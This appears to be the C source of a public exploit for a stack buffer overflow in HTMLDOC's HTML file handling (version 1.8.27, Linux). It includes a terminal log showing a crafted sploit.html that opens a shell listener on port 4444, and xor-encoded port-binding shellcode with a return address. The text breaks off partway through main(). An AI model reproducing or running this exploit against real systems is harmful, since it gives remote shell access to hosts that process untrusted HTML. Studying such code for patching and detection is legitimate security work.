/* HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux) Reference: http://www.securityfocus.com/bid/35727 Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR) Credit: ANTHRAX666 for finding the vulnerability Coded by Pankaj Kohli http://www.pank4j.com pankaj@zion:~/test/htmldoc$ cat /proc/sys/kernel/randomize_va_space 2 pankaj@zion:~/test/htmldoc$ gcc htmldocb0f.c -o htmldocb0f pankaj@zion:~/test/htmldoc$ ./htmldocb0f [*] Creating buffer [*] Exploit file written to sploit.html Run as: htmldoc -f somefile.pdf sploit.html pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 pankaj@zion:~/test/htmldoc$ ./htmldoc-1.8.27/htmldoc/htmldoc -f abc.pdf sploit.html & [1] 3287 pankaj@zion:~/test/htmldoc$ netstat -an --inet | grep 4444 tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN */ #include #include /* Port binding (xor encoded) shellcode (port 4444) */ char code[] = "\xeb\x12\x5b\x31\xc9\xb1\x75\x8a\x03\x34" "\x1e\x88\x03\x43\x66\x49\x75\xf5\xeb\x05" "\xe8\xe9\xff\xff\xff\x74\x78\x46\x74\x1f" "\x45\x2f\xd7\x4f\x74\x1f\x74\x1c\x97\xff" "\xd3\x9e\x97\xd8\x2f\xcc\x4c\x78\x76\x0f" "\x42\x78\x76\x1c\x1e\x97\xff\x74\x0e\x4f" "\x4e\x97\xff\xad\x1c\x74\x78\x46\xd3\x9e" "\xae\x78\xad\x1a\xd3\x9e\x4c\x48\x97\xff" "\x5d\x74\x78\x46\xd3\x9e\x97\xdd\x74\x1c" "\x47\x74\x21\x46\xd3\x9e\xfc\xe7\x74\x21" "\x46\xd3\x9e\x2f\xcc\x4c\x76\x70\x31\x6d" "\x76\x76\x31\x31\x7c\x77\x97\xfd\x4c\x78" "\x76\x33\x77\x97\xff\x4c\x4f\x4d\x97\xff" "\x74\x15\x46\xd3\x9e\x74\x1f\x46\x2f\xc5" "\xd3\x9e"; long jmp = 0x0804d938; // push esp; ret 0x0807; ;-) int main(int argc, char **argv, char **envp) { char buff[512]; int i; FILE *fd; printf("\n[*] Creating buffer\n"); strcpy(buff, "